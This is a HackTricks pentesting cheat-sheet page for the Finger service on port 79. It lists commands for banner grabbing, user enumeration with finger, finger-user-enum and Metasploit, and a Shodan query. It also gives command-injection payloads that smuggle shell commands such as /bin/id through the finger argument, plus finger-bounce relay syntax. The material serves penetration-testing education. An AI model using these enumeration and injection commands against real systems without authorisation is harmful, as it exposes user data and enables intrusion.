hacktricks/network-services-pentesting/pentesting-finger.md

103 lines
3.7 KiB
Markdown
Raw Normal View History

2022-04-28 16:01:33 +00:00
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>
2022-05-01 12:49:36 +00:00
# **Basic Info**
**Finger** is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number \(if known\), login time, idle time, time mail was last read, and the user's plan and project files.
**Default port:** 79
```text
PORT STATE SERVICE
79/tcp open finger
```
2022-05-01 12:49:36 +00:00
# **Enumeration**
2022-05-01 12:49:36 +00:00
## **Banner Grabbing/Basic connection**
```bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
```
2022-05-01 12:49:36 +00:00
## **User enumeration**
```bash
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
```
Alternatively you can use **finger-user-enum** from [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), some examples:
```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```
2022-05-01 12:49:36 +00:00
### **Nmap execute a script for doing using default scripts**
2022-05-01 12:49:36 +00:00
## Metasploit uses more tricks than Nmap
```text
use auxiliary/scanner/finger/finger_users
```
2022-05-01 12:49:36 +00:00
## Shodan
* `port:79 USER`
2022-05-01 12:49:36 +00:00
# Command execution
```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
2022-05-01 12:49:36 +00:00
# Finger Bounce
[Use a system as a finger relay](https://securiteam.com/exploits/2BUQ2RFQ0I/)
```text
finger user@host@victim
finger @internal@external
```
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>